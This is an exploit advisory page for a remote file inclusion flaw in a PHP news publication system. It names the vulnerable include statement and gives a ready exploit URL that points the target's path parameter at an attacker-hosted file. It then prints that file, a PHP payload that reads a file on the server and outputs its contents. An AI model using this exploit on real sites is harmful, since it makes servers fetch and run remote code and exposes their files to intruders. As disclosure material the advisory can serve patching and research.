News publication system remote File include

Credit: navairum
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Software: News publication system -------------------------------- Description: News publication system provides a mechanism for news blocks publication on site in conformity with rules and templates set. Provides a mechanism for adding news to the system and news management. Provides a mechanism for system management functions access control. ------------------------------------ Site: ----------------------------------------------------------- The variable $path in class.Database.php isn't defined before it is included. Register_Globals must be on. Vulnerable Code: if ($path!="") include $path.""; else include "../"; ----------------------------- Exploit http://[SITE]/newsp/lib/class.Database.php?path=http://[your server]/jacked.txt? ------------------------------ Jacked.txt <?php $file='../'; $handle=fopen($file,'r'); while(!feof($handle)) { if($handle) { $data = fgets($handle,filesize($file)); $data.='<br>'; } else { echo 'handle failed'; } echo $data; } exit(0); ?> Navairum legalize it

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top